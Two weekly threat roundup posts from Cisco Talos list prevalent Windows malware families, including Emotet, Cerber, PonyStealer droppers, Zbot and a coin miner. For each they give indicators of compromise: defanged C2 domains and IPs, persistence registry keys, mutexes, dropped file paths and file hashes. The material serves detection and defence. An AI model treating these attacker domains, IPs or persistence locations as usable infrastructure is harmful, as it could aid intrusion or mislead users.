Today, as we do every week, Talos is giving you a glimpse into the most prevalent threats we’ve observed this week — covering the dates between Aug. 3 - 10. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, we will summarize the threats we’ve observed by highlighting key behavioral characteristics and indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

The most prevalent threats highlighted in this round up are:

• Win.Malware.Dbzx-6628757-0
  Malware
  This is a variant of the Tspy family. It is able to execute after every reboot, making it persistent. It contacts domains that are related to RATs and are generally command and control (C2) servers to upload data, and receives additional commands. The samples are often packed and contain anti-debug tricks to complicate the manual analysis.
   
• Win.Malware.Emotet-6628754-0
  Malware
  This cluster provides generic detection for the Emotet trojan that's downloaded onto a targets machine. Emotet is a banking trojan that has remained relevant due to its continual evolution to bypass antivirus products.
   
• Win.Malware.Zerber-6629234-0
  Malware
  This is a malware identification for a ransomware variant of Cerber.
   
• Win.Malware.Startsurf-6628791-0
  Malware
  Strtsurf is a trojan targeted at collecting personal information, and sometimes labeled as a potentially unwanted application (PUA) in other coverage signatures.
   
• Win.Packed.Eorezo-6629326-0
  Packed
  This malware is known to enable the display of advertisements in Internet Explorer. It's also downloads several pieces of software and installs them in the background.
   

---

Threats

Win.Malware.Dbzx-6628757-0

Indicators of Compromise

Registry Keys

• <HKLM>\Software\Wow6432Node\Microsoft\Tracing

Mutexes

• QSR_MUTEX_HnRHWDxWQnveBdUtWT

IP Addresses

• N/A

Domain Names

• ip-api[.]com

Files and or directories created

• N/A

File Hashes

• 25430a357d53aec77dd1f119b838ceae79a22bb3a60c7a002cb7328b098546a7
• 54279416f864d374f33fe9a2fe2998db3976c4ff43e8b0da006548489a50bbdd
• 5ce812ebf77f6d63de37a1e3d261b9688d595aaeadaef3388f4214896bb64892
• 810fb35557e051a7be3f03b37247c90796595a2d5afa1b2c3034187de2a3f0bc
• 8f08bcadd3a44055a70dbae3308cf18c8d1824e424100eda03ddc71e9417fb5e
• 9435b87c7c91ac98f9f461aeaa6b1630e2270e2d2ccdf6a05d46fa02de91d1eb
• 9634a2afb40139e39da8c8ef0da8f5104229d7bb4c3b95faee5a4396713f528e
• a137c89d2c6f0ae74217724e1cb56aea726e285d0e6e98adfda16617ad51d176
• a2907c7011b20373fd47e03a0f4679fdd51b982b973bb37d1d45bfa4a618bc5a
• b3c6a0883d9ed8bcf1bf162c0ade8b16f2cd4ae890e30ba9e9540f4bdf5f5ba1
• ba5afe1245d10f72637d34a96bf6e365c2f4326da69dcd440beacf421b634133
• cd3a4783c2795a16c82518c56f955c9b56f415d59ef5bc77e143f6124123364b
• d0dbd75a4d8716ba7ca7d025ee1c772aa4ff554214a993b4b874a0a26dcf5a6c
• e2116a9a176ff765f1c5ec23003266bfe0f1592e46e41236482ad4c3520ea53a
• e2846881f6127d99222144e4ece509bd18522fdd7791bf84d7697b37ffa40919
• efc3e1b1d6c13c3624160edc36f678dd92f172339bfde598ad1a95b02b474981
• f7df8c9e36cf3440709111a33721e7ac7268a2a80057df08843ba95a72c222eb
• fdd4cce37fd524f99e096d0e45f95ac4dac696c8d7e8eb493bb485c63409c7b3

Coverage

Screenshots of Detection

AMP


ThreatGrid




Umbrella

Win.Malware.Emotet-6628754-0

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• PEMB2C
• PEM944
• PEM80C
• PEMA10

IP Addresses

• 67[.]68[.]235[.]25
• 187[.]192[.]180[.]144

Domain Names

• N/A

Files and or directories created

• %WinDir%\SysWOW64\TO5sH5uBMit.exe

File Hashes

• 0406ad0fe90d371b02742e6821486abbfbf2bbd72a7593e8ddb650f0b97673b3
• 0604aa87706cb7890075b494f026c88b2f03b621367f1bb62a87f5c5deb87870
• 086af92d83279f5792c15a762a70e158de54b67c1a96bfc14c4ad52a24468f32
• 10f13af2a3591efa3d58c47bb0635e3a653e14ec7726493bb4595b4dd8cd51cb
• 127c316e7a10579e61369d6a8154e3e34726209b3cc075ddd6d9875c439c583e
• 1fc9fda1b0c868dc7cb0cf6d8867b7aefc202436fe9e41cba5b2b35bb1ce9e9f
• 23ba67cf24c95f3bfd36b66f822feb3d2fd0f72617921550fee034a1b7b8cc74
• 27e37ac7cc8b48573a8345223399ce6b0ab9432ee977acf02c09bcf64cf6622d
• 2bf1192e5200b6f8d25586908b05912a5fa6e06e87540dbb914200446a3deb10
• 2ee83958eb1e8cb622ca833c38e51b53548d299b6574e5b7203741a2d27963f5
• 2fca527cf8ebf4576e982118e22dfe3fd8e445749a5403dafed36089666f2357
• 30bbfb79d26a172975e9482204f06423eff6948b1732384e7b6d23f9932ec08d
• 30bf6e1a41dea6e4024853f9b7a6a878e4f5e4141dba4b0fe7686159925fe6cf
• 42fca9d196c668747b74f80ca996aee9ae38bed96956b42436949a8d4d33ecf1
• 45e6356ca3b373da3a80a72a1b64f1254f4426949598b8877abd6de99e379166
• 4ac5db87bc83dcbf1399f4fc0fede3c5ecee5b8ef2a2500fd79b1588ef033429
• 4b2f6d80bf78ad165c2f07d914cb4137ba31918f3f8f03f812b20715c3451f56
• 4d7d9d73dad989590860178530dd8848d9b79a23f1cb379bc1ca5545cb196eca
• 4e81241256ab4adb5bb96b21633d95773cc34ee72e499659064db0d32046dabf
• 4ea92195bc159e268c7a348f2649010cb01a3e67c315d2f0b8115eaf2c879692
• 5639d3af9cf530a057aebf3cbf92061b58539b2c311491a26d8f404a211d66bb
• 59644dcd34cce275ff5d72c022fa76ac42a422b038d816909281e01e392d3b40
• 599e4e8130e4a1f3f3777c6f9f088cc03c2781f4e802e0e16e417a43ec58c518
• 5eef8b5433ebc22e4c9ea3c1462d525192a4bda8d20be4e7b09fe7d03fb9d119
• 6238c7a704baa8771812e4f3452acb042c6475913db4cd57cfaf17a7454d4d22

Coverage

Screenshots of Detection

AMP




ThreatGrid

Win.Malware.Zerber-6629234-0

Indicators of Compromise

Registry Keys

• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
  • Value Name: FlashPlayerApp
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
  • Value Name: Run
• <HKCU>\SOFTWARE\MICROSOFT\COMMAND PROCESSOR
  • Value Name: AutoRun
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\CONNECTIONS
  • Value Name: DefaultConnectionSettings

Mutexes

• shell.{381828AA-8B28-3374-1B67-35680555C5EF}

IP Addresses

• N/A

Domain Names

• N/A

Files and or directories created

• %AppData%\Microsoft\Windows\Start Menu\Programs\StartUp\FlashPlayerApp.lnk
• %AppData%\{6F885251-E36F-0FE6-9629-63208157D7A2}\FlashPlayerApp.exe

File Hashes

• 25f8455b83b98f38809af120e35c3eda189a05538f7aa2d527a265520bc3c75e
• 342a9470e5d3dd522c17cf0a5bc588d87a84689d90362c0b18c320385b2e908d
• 41ebdf1d4a210f395d5ee32bf55c6b07ee1e0a0bdf939bd081f6d751323c643c
• 54be105a129d959359107d7dff6b379cd366e32bf7be9ac9a06bc2141d3ca7fa
• 5dce0e7e0a1807d2804f28c5d5afd4ac282a022acd1945786bd118e1caf4050c
• 5fe244200c9367e1b132ccc13df6daaba5479d2491db8fe95658f43981567c5a
• 6292ddf51023ccca84211ed4f33944b4c3df1b694d102d90d3dd2a5a080ed2b9
• 649c52d7b9a58837e6ccd308665d63971e424d29480c44448ddbef15e91649a6
• 6dd74f0816f8b24a6f93c2dae0c69d33689e4baba632605d138216d9c7aab2ba
• 7322fb7767b733ef5a279720f581d54edae9ea4af69d39aaa3e79fc443e2bb33
• 76be26ac77aa81a5fb7d78135adb05b579cecc2173ffef5f5ab6b484e37f9e6e
• 793b978af24469a77490ea609de0142ff817e557ad78a688dd5d65c2fe49a8db
• 7c0e65092e8786d9052bbd74f4dc7b26567e150efb25d1503c4bfd9b3895b8ab
• 8815e1daad1f9cb4ff4243ff485218e3a0be93e2afef07048852ba79fdd9294e
• 8e84fbc38403f1516447b73b73b5051777314089f0d1fefcfae004b1ef615641
• a0e3bd64d556ce80b85b7d328bb61beeaf2da297dc09058211150617d6a83b8b
• b6b3b53b1001b6de24797a89d61bd825760574ab4cb60f7a5971115acb53c8e4
• ef66d0161200d413bb8a577a517fe03f325f2fd2f0df778f6297a8658ca0abc8
• f25d03efc63cba1a262034382f809aaa5918f218b965164897df0c989a08dd04
• f8ee14337fe367aded0aee32c6c84ce404eaef53a6f75d86c6c08235f55ec303

Coverage

Screenshots of Detection

AMP




ThreatGrid




Umbrella

Win.Malware.Startsurf-6628791-0

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• Local\MSCTF.Asm.MutexDefault1

IP Addresses

• N/A

Domain Names

• lip[.]healthcakes[.]men

Files and or directories created

• N/A

File Hashes

• 00cc9438408d1b22b0afc57e3b233ff62774cbcb92e58b392403d8c794d988ed
• 118e08c379b0035cef2a155d59d97c6e8cae94b6f46c5e77f58d84c88c689d2c
• 1f270dc860158d63bb400e08f12bce40a9a50494368ea6e44cfd89f7e0dc23f4
• 3e49b3e58eec40b735124509bafcf434904f5945c9d65a5a860b0950850a979d
• 4348a4b50eba73d6eb5d0d254241d0e44fc63c975b589ac5276d6dc5cf8bab13
• 4a1c1cf9c70b127cc514fa6cdbb0e286ee33bf19f6ff41ca02951c9947dac55e
• 4ae8cf675d6517b7989391fc653e8ddc96aa81cec4802e7e66de30adf0e96d2e
• 527eac30113eb365330ec5c35591fe9ae69d4e1beca8b0ae24666e97d8773e36
• 53366f90f59348b8de81bdc04652200d2dcf8bad5cfc46a533c3b20cd0e200b2
• 5f98685ee9098a31ced944840670772bb972db31ac5d1690974e59f566d1adae
• 61e7c5b6a7f1608cf0bf728d15f8cdfc0f9f5c7c3748ee28452cfa2a496e54cc
• 70ebc88b9a71c661b68325dd92d0945ea1927e4d115da217640a4efefcf0c730
• 722e86b32635a1cace77ceee414761f28e386743fd2c513650e55814179bdac5
• 91bb8eb10e0aa88ea1e33d1ec23893d5a45e01e8ab69081b96835b4aff3b906a
• 97645bb27e056b282a0aa46dbbc79ed03bdc29c6f96e369d7537ee2bb1c8dd6e
• 9b36f0e70d5f7b4795b1278e052356484d4f2374f49563195f224ade6ce08c71
• ac86cafcc7062a389e25a4e26dd15df7ce2e64b7a6890bf5712189ab9ec81c8c
• c3883ba74230604d38a638a1b8d0673cc3c91e01b482e6b83a6e6bbd4edd3b10
• c56e3ca164803c5668cf0b8228c97626c486f5a7063d4b3109840137b67c8f98
• c82eaf2f1f156b95b43b2a984867e486911f6ceb329daea6ac9a6c53fae42685
• ca544eaedd654782fa6b7a130bdc58869c2124a59754ed1baf9a5c00fafae12a
• d4ab2cc67c707cab8f7aab0fde94b50670f1b787b049f45564fe5368205ed642
• eac8c3c76e954d8e2be7a5d1570643b4ce6a856e8143faf6263ad50cf53aceb2
• f0a9c1c2fc19b4abd905e8a2f187f94e74dfe1e7de2d9a5328b13893b301488d
• fb2aa3891cc9383631ddcca4076ae800d67d701a7ffb83d48240cc1d72372175

Coverage

Screenshots of Detection

AMP




ThreatGrid




Umbrella

Win.Packed.Eorezo-6629326-0

Indicators of Compromise

Registry Keys

• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
  • Value Name: 6518673

Mutexes

• Amazonassistant2018
• Windows Workflow Foundation 3.0.0.0_Perf_Library_Lock_PID_2c8
• Windows Workflow Foundation 4.0.0.0_Perf_Library_Lock_PID_2c8
• WmiApRpl_Perf_Library_Lock_PID_2c8

IP Addresses

• N/A

Domain Names

• www[.]wizzmonetize[.]com
• ionesystemcare[.]info
• www[.]rothsideadome[.]pw
• www[.]usatdkeyboardhelper[.]pw

Files and or directories created

• %ProgramFiles%\WJTLINYZUI\cast.config
• %LocalAppData%\Temp\DaGXhZc6w\Nursehealth.exe
• %System32%\Tasks\One System Care Monitor
• %ProgramFiles% (x86)\OneSystemCare
• %SystemDrive%\TEMP\config.conf
• %LocalAppData%\Temp\U8R09Z5FM2\OneTwo.exe
• %LocalAppData%\Temp\U8R09Z5FM2\up.exe
• %WinDir%\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new
• %ProgramFiles%\WJTLINYZUI\GCOMQP0KN.exe

File Hashes

• 002d9959f5e7417cc2cbc657243f2dab82fac3d2e94fa2d0c8e45eda10889b08
• 03c948623cf78efe90258d894ab0e793bca7009bd73d0be0f652575f81bda621
• 0f8d729821902252b7f7a1c0d51004d3770356969e7181548126f13f1e2ebf2a
• 1e64134ff7358ea6e632fd2377532491235cf089f33095a72552e150088b42f1
• 1eed9456e69a80cb4e8444ad0356d71e09a073715f92e51afa008e80d2a0352a
• 26f928ef89fde0e3e3fa996073c7c0bba00c2cbfe280de338de15367f4c8f76b
• 2b0c6557b39ad8cca97ea6975aa3f4a8341774461b1bacab05d04ab20a9463eb
• 3a5ac5c5ee7985367349d84d60be2c5f94f876c56cf73acbae6fc680ebbdb3c6
• 47bcf1f1bca23a36e291a0ac4cb8d1cd59c0c80d6a8e3b2cc3d646284cc531d5
• 4ae3efb9a9cca68c098dcdba33d2aef39888cf229cd02be64cbf59a0b68dae30
• 5112edf0351d70ad31152f67e8996c9c4ad062f0023cfd43b4baecb8aa7b16b4
• 52544303a89f2c4e3eedd64c000504a2ef4c920c20361961fc81cae3f520244f
• 55e181f0e0e88efccf6534949ad8dd93a179e2b94b71e76a9e7db4d938ea2bd2
• 56982cc1f4b4e92aea28a30684bdfc752122eb78fc545ccc3f4169a1597233cc
• 5c3982a206d40ec00b2029d4bdde1bb37192341583e803556872b97a609411ae
• 61ee5c724a4c9408e9c8120eabac1babea8e91bf5719b02c78ce129f68239ff6
• 63cc723ad7e85798e9126f5cc933c48d0e3cdfa7504579ef0b0b3cced9cb19c8
• 65a0bb3fd94ec888696598703ed111471bd47962278a5f1006e7e0716bd5b58e
• 71d6d1ed9a5bd71e8dbd03a91151a2965ac12198fa1825366bf19c4b14106cb7
• 71e3009284ae35a3087ef041162a2ada636b388738033ea62faefc2bbfca9dfc
• 7e17ee126754a9306b4ffcf536f384abe5c718672807de1e27e7c7f3846d9e74
• 85b36ab50aeb452822886815076c7c90c30273854496dde7fd3473e62119f672
• 877b9a03f0b8763c265ecbc4be76ffafc9eb26c4b618c2827ce1e200797ca876
• 885718a7bd95c44d14dec7f0efa101147b671e60a7ecac2622ac86061dab17f2
• 9583c8f1f3c9982a45ed56fbc30f8be06708cfaa8557aa7f5b6117847018cd4f

Coverage

Screenshots of Detection

ThreatGrid



Umbrella

Critical Vulnerabilities

Important Vulnerabilities

 Coverage

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between August 10 and August 17. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

The most prevalent threats highlighted in this round up are:

• Win.Dropper.Tovkater-6646868-0
  Dropper
  This malware is able to download and upload files, inject malicious code, and install additional malware.
   
• Win.Dropper.Ainslot-6646850-0
  Dropper
  Ainslot appears to be a dropper for PonyStealer, a bot that attempts to steal passwords from a plethora of applications on an infected device (web browsers, email clients, instant messaging applications, and many others). Also, once on an infected machine, it attempts to spread itself to other computers on the network.
   
• Win.Dropper.Shakblades-6646807-0
  Dropper
  Shakblades appears to be another dropper for PonyStealer, a bot that attempts to steal passwords from web browsers, email clients, instant messaging applications, and other applications.
   
• Win.Dropper.Cerber-6646769-0
  Dropper
  Cerber is a ransomware variant which encrypts a user's personal data such as office documents, pictures, and music. Cerber also attempts to exfiltrate browser history.
   
• Win.Dropper.Bublik-6646706-0
  Dropper
  Bublik appears to be a dropper that in this outbreak is used to drop CoinMiner, a cryptojacking virus that aims to use the computing resources of the infected machine to mine cryptocurrency.
   
• Win.Dropper.Zbot-6646698-0
  Dropper
  Zbot (AKA Zeus bot) is info stealing malware targeting users banking credentials. You can read more on our blog https://talosintelligence.com/zeus_trojan.
   

---

Threats

Win.Dropper.Tovkater-6646868-0

Indicators of Compromise

Registry Keys

• <HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
• <HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
  • Value Name: UNCAsIntranet

Mutexes

• N/A

IP Addresses

• 185[.]80[.]54[.]18
• 5[.]149[.]255[.]178

Domain Names

• strangerthingz[.]club
• chubbyoasis[.]top

Files and or directories created

• %LocalAppData%\Temp\nso9D20.tmp
• %LocalAppData%\Temp\nst9D40.tmp\INetC.dll
• %LocalAppData%\Temp\nst9D40.tmp\crub.exe
• %LocalAppData%\Temp\nst9D40.tmp\nsJSON.dll
• %LocalAppData%\Temp\nst9D40.tmp\boima765.exe

File Hashes

• 122715db6467d64ff21864afc1d5e15f5780ed05dafda8085fad323ca5dd02f2
• 13de4d085dfb857c5580425dcc787ee73b4dd78d0272e8a72d25915b6dedf9bd
• 27dd184fb1b5505f6bc76c72395a50070c7b594963ad591b265cec17a3b4a6ca
• 2a6753ea1a7a2289589550672980137480eadfc3c5d2a4135cbe152a72817b00
• 2c72964b8a701a9aa90f6cc46adbf5da695f990f707e48fe62b5de48c4ea51ed
• 359c2d5d7ebb5b6805c91951d0eb557027e6524795e144625eec951981199b0b
• 44822b0f38e0a15c2128bc1c58afeccf45916539bede62501117e8ce106b95ce
• 575fb1eca107f6999105302e60ae24992c335260c8761c9cdf676a3ca56bf389
• 5c0a9f3375eff3b50d58092e17c2c9b464cbabbbb531b77069dbdcce59d6e05e
• 63aecefbe9adc433f873e5ead9b846e3bc7aa35997594194b1fe3174ec42b84d
• 66f336a2616a16d8891503dd145fb12835497a13f19a65946d6aa68242cc23ae
• 74f523c55af0e9555345df23ee8e72ee05c44d37fad68950732c033b27aab0e2
• 8ba4e8b2677e8bff0e3d527fffa0540b5a7ce4eb8dad4667f9426b9b224fab19
• 9362f6da347323c27790bf53e2423299962a42ba11baec0a9efca344277ae027
• 9db3546b5f6f8d60b1f635d07a10e8fc11e3b72f66161ee8621d29829fcbffbe
• a1e41d046f3a8386c3115edc57a16c4da82d9607b35d7a635b1c14f1d94d2242
• a70f8fd943406144850ce26d3a6103c32200dabd95563a2040d73ecf1b37ef2b
• a7de2542cfb82d489531efc49f65fbc31b1808f2353c7f20b781a66c727a50f6
• b760a4cea26c261519ed2a3a0814ae8e56ea10414e10213980e7eb34509fe571
• d265dcde9fe14ca5524b4fdce20bcf31ff5a010376cb174df5c3a4ce819ef82d
• da88d9c7c8010ea49472872d29c9c2d542a82a1f41e5726529dbdc34c363b6a3
• dc265fc791815328bb9df123c19bced472b4d5621f9331ab679b710fb0da608e
• ebb6267a01b66d6741497c9d780da069d6a7d3f17d2bfe287470da5ecee3975d
• eedfbfa60755288a140b84ee00957c0032baba0bf299cea18d5fcca85e7d41f5

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Dropper.Ainslot-6646850-0

Indicators of Compromise

Registry Keys

• <HKCU>\Software\Microsoft\Windows\Currentversion\Run
• <HKCU>\Software\VB and VBA Program Settings\SrvID\ID
• <HKCU>\Software\VB and VBA Program Settings\INSTALL\DATE
• <HKLM>\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
• <HKLM>\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
• <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
  • Value Name: DoNotAllowExceptions

Mutexes

• 944S06VZFP

IP Addresses

• 94[.]73[.]22[.]65

Domain Names

• facebookwanker[.]no-ip[.]biz
• 5facebookwanker[.]no-ip[.]biz
• 4facebookwanker[.]no-ip[.]biz
• 7facebookwanker[.]no-ip[.]biz
• 1facebookwanker[.]no-ip[.]biz
• 2facebookwanker[.]no-ip[.]biz
• 6facebookwanker[.]no-ip[.]biz
• 9facebookwanker[.]no-ip[.]biz
• 8facebookwanker[.]no-ip[.]biz
• 3facebookwanker[.]no-ip[.]biz

Files and or directories created

• %LocalAppData%\Temp\MQVCD.bat
• %LocalAppData%\Temp\MQVCD.txt
• %AppData%\winlogonr\winlogonr.exe
• %AppData%\Bot.exe
• %AppData%\Wow Logs

File Hashes

• 05dd67a86f9b9d5afe4c069798350d8114784f25199777bf459fbd244e600200
• 0cc20f105cf4630239cbb192b5085c5323ccddafe2804420d07bdc84e9f69f74
• 18778b49fc35aec08184cd4426dc698bd7b89a47dce15861bb9fa4384641d6c9
• 5908a9ebe9fc15e751f7ef39c2479413a96f6086899927d23ea7faa83b521fca
• 5c4cd71d85e9fc4dabd709b64691acec25c9fba77b3ed6bbee63fc454ed77883
• 637967a9e3b007d0007035df3344060ac332aed97f5b4a170a1fcfc5e1438672
• 72967919bec8028198f4a79997dcd957a6d6c0a9dfb7dbe5b2ca29a00debb41f
• 7659c69ab75e087038e59f6e60a2d7927503c390b212787342b4ba53e6f72fe8
• 7b8fd7667a87cf87691feb2727ed78f832e8b84f4edb123057ac21fc173bdfcf
• b411c969228d3324eae00e9468a05bf37ecef76fb81e41620dfc9d19bd067f47
• d20f23c05b7781d2e5866336693f81041b8b20ab7135812a495d5f8dfb1e5ac5
• d333daefccd7d188cffda7c75d589389140f24bfab759368217f2514ded312da
• db3ff8db6b2387a8b4be629c96f4de36288a8945e6b0910ff9823ecaef92d96d
• eb53dfbe1dcb04fd2ad9891f9d5ae3df926d7b9ee6865b06e040ca3ed91019e7
• ec72aff9d0f5d5e8735589b554e2659ef8cb1f462057415f8c6219a1ae1b90a9
• f7c8bec61762fa31fb766f50144cfeecabea3aad4d12818b4ee8969777181f87
• f92ed6167aa17d2d242d5c0a15b63d5a2b2ab354ac0c9988d34dbe47d5138719
• fccbb20a19943cac05429361f6ffb51b494e02b86748761e5d26d4bdac3a7ab3

Coverage

Screenshots of Detection

AMP

Win.Dropper.Shakblades-6646807-0

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• MSXLJHYHDS

IP Addresses

• N/A

Domain Names

• kreuz[.]hopto[.]org

Files and or directories created

• %AppData%\1HVMD5254F.exe
• %AppData%\DAVID
• %AppData%\wrinlogfon\winlogfron.exe
• %LocalAppData%\Temp\HIDBE.bat
• %LocalAppData%\Temp\HIDBE.txt

File Hashes

• 016c6537acdbef9cca85e500e9a9ab650c62cfe0e05cd37663cd3b5668864a9d
• 0c4170015c7a48b55416dc02fbd0a85d885547bedd2356898f5380c6fd7ab085
• 0d429037ed21d35c4fdded8e65ee9d6d0c548937c28369d838e2e1211222a83a
• 10b618f4c85c7a514f5c50bd46e68c413d4388f461c1966b1617f4c4ae22afbb
• 1ce376ab7dcfa447ba60f8904d137cd498a8d931097b0d06b53201993ad1011b
• 27b3826f6176760489fcaa575178076427de6d56db4c9050825e511647fc1cea
• 2c879e03a6e84026f9dd4e2606ed53896ac202c4a442d4cd558f5dd7758eb9be
• 2e7446954c517685771f6fb8ee3a6752c83d1705246f63291c3de596d509b3a8
• 356ec18e7dc92a42a958b046d77390e4427f8cfb9d7a8b380c8b31e1bac8b227
• 4f67dac4052c730e52f56e620c43ceb4b222e20a3ce40f2822f8e8bbd4fdbc5d
• 676920425645985a36c17bc77a80ee9b7d13d15a65ffa25663da28b78ed5d275
• 907f25a969725e7af3b8de2399314d89e09b6c47f39aaa9855362e69e11fff2f
• a00b05b4d45feaadaddf847ae826d8c0d2d11bf301ac60b2f1371bf6fed747a2
• a2a0ff0c895c2ee15787172fda8daec61e52423a61eb912726caad17fbad16b2
• a62256b872b872d532e918977dc5cfb86a33b1a547c63df0a0ab5a9cf3fcae80
• ab0d49a0a4753fec8440ea5d8a8840e1109fb87eedc57b6a411b0cf670f6fb3c
• b838fc5bc77d7fe32d47c5a462833254ce6707649191418670390d7cdb61e041
• c1abce71c3c7e5db2f246734317cbef66382b532faff075145f5dbf417fa4a69
• c737b0fd6f3ee58298a7080fe5033b66cb85387209c27e7eb69c0154b2efc5ef
• c8d7c48180f999411d4cc3c6fdf07a7f4c3e94a9371924789144e9225cfab613
• cde4c0a0c599c4310a717224db5f379c977f96b541f9e60fb0d7e3b3cabba206
• d52a70c87a7a813d46bdf712a852ecf082b920b22b86b981f51702bdc91f42d5
• d8383a3bbedd188751d368426527a848582c4c7b52f5985fc279da2130740ad7
• e202fee1655a34f268f29f2c2748742e155c10adbc7af56096dc0e7721352522
• e5fa827dc03d7f86c9a40f74c7446789fae1c1c719fde7401477b7a8b8a0e49f

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Dropper.Cerber-6646769-0

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• Global\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7
• shell.{381828AA-8B28-3374-1B67-35680555C5EF}

IP Addresses

• 94[.]21[.]172[.]0/27
• 94[.]22[.]172[.]0/27
• 94[.]23[.]172[.]0/24
• 94[.]23[.]173[.]0/24
• 94[.]23[.]174[.]0/24
• 94[.]23[.]175[.]0/24

Domain Names

• p27dokhpz2n7nvgr[.]1j9r76[.]top
• hjhqmbxyinislkkt[.]1j9r76[.]top

Files and or directories created

• %LocalAppData%\Temp\d19ab989
• %LocalAppData%\Temp\d19ab989\4710.tmp
• %LocalAppData%\Temp\d19ab989\a35f.tmp
• %LocalAppData%\microsoft\office\groove\system\_READ_THI$_FILE_Y3VYE_.txt
• %LocalAppData%\microsoft\office\groove\system\_READ_THI$_FILE_YPEAM_.hta
• %LocalAppData%\microsoft\onenote\14.0\onenoteofflinecache_files\f173a3a2-bd1a-460f-b78a-faf2a51f6d91.png
• %AppData%\microsoft\onenote\14.0\_READ_THI$_FILE_3SN82PK_.hta
• %AppData%\microsoft\onenote\14.0\_READ_THI$_FILE_WMTDNF_.txt
• %AppData%\microsoft\outlook\_READ_THI$_FILE_6GURWE_.txt
• %AppData%\microsoft\outlook\_READ_THI$_FILE_WJ3WX_.hta
• %UserProfile%\desktop\_READ_THI$_FILE_0H82B5G_.hta
• %UserProfile%\desktop\_READ_THI$_FILE_AU0XA34M_.txt
• %UserProfile%\documents\_READ_THI$_FILE_8F6J2D_.txt
• %UserProfile%\documents\_READ_THI$_FILE_E96X_.hta
• %UserProfile%\documents\onenote notebooks\notes\_READ_THI$_FILE_BUSBRQ4_.hta
• %UserProfile%\documents\onenote notebooks\notes\_READ_THI$_FILE_C8LD5O_.txt
• %UserProfile%\documents\onenote notebooks\personal\_READ_THI$_FILE_BMFXHU_.txt
• %UserProfile%\documents\onenote notebooks\personal\_READ_THI$_FILE_OCWSSKQ_.hta
• %UserProfile%\documents\outlook files\_READ_THI$_FILE_A5RM_.txt
• %UserProfile%\documents\outlook files\_READ_THI$_FILE_LT8MXL_.hta

File Hashes

• 01ccc0ce21b27ef9f5c3971ebf16704a52566732c504aae14955bcea007c1360
• 31a011aa4c6a4577319aeaebe9bc63d8571740fbab18455129da760501006f3a
• 3897f90f821df8386201a1d14aa1d5d6de338a64f5c6cf51da3c96931fb787d8
• 48f69ba14e9d3b4762d853419928f39a7a70cd48e8bb56b716ceb957e23cd3a6
• 4d51bf97c73d48dd9304575bbd3494c33dcf3c85d53aed0f4f901fe96895d810
• 53f20f30c24cf8942eb192524454f61f068ee83aa5bb02b7a89f16f3e70a8b5f
• 57a13d2976e4e6a9394a90f5da3bdb42714fb0cab74d43b860fb0e80c3208d97
• 5f492095de7265801ba48b55ca6741b74968f1a96b18e3704274001c9e6c8f04
• 5f58f99bbfa81bdff6d2e73220a714b1efdc90ecb48a392b5f2d8206724832ef
• 614b7efd98f2d075340628671dbb67048279669bb835e2b61c3a31af9d18ca00
• 6e928eafd030a58fa9ac593653d05d743e99b7bb97b5b9141a019d028378b72a
• 7127c13fd230b22bec5bf65d5e4663009b7e22d59fcb29ed74ff8c069ca6e6c2
• 756db69df59743a929b996fe3e5052e0842b07f5cac8b44e78ad0ec3b167707b
• 839786a3b6ba6b684eb0f4750ed496b67a942f1f3ff1878dd0178fe77ce849ba
• 9e1588b5a752155f4343c8570231c2316dddabf0be40f4fb875f5b00f14f17ea
• a5a7ec4e789279b99184b11a1afc57d2c3d2e3cdde3dd09e0445bb362f3871d3
• b73e496aba15e6b803cc3ccf15bb6dddca12c620aae79044fe6ddfbb6a181540
• d052caefcf6257c84e81cb098313a22dbf87e52fe2311f3b42acb271154a858f
• dbf302b95d80c5d7071d082aab51318e313353df5c0ce3cff661259378b8d261
• e050ff33f3702c8498b67d3ff41c45755ad5c94e559bff7ef0ce447b2424bef1
• e15393009c141d5d79f9021efb836faace4533da414fb35731f1ea9097fa73db
• ee727012e1069ea62d388ace8e341e33a679295ad3eed5076372b64f7ea2015c

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Dropper.Bublik-6646706-0

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• DBWinMutex

IP Addresses

• N/A

Domain Names

• N/A

Files and or directories created

• %AppData%\COIN-MINER.EXE
• %AppData%\COINUTIL.DLL
• %AppData%\MINER.DLL
• %AppData%\PHATK.PTX
• %AppData%\USFT_EXT.DLL
• \SystemRoot\AppPatch\sysmain.sdb

File Hashes

• 01b6b22ab179d3718bb936f9bd71a33ab75ce980fbcb16a7aef10135204ceb1c
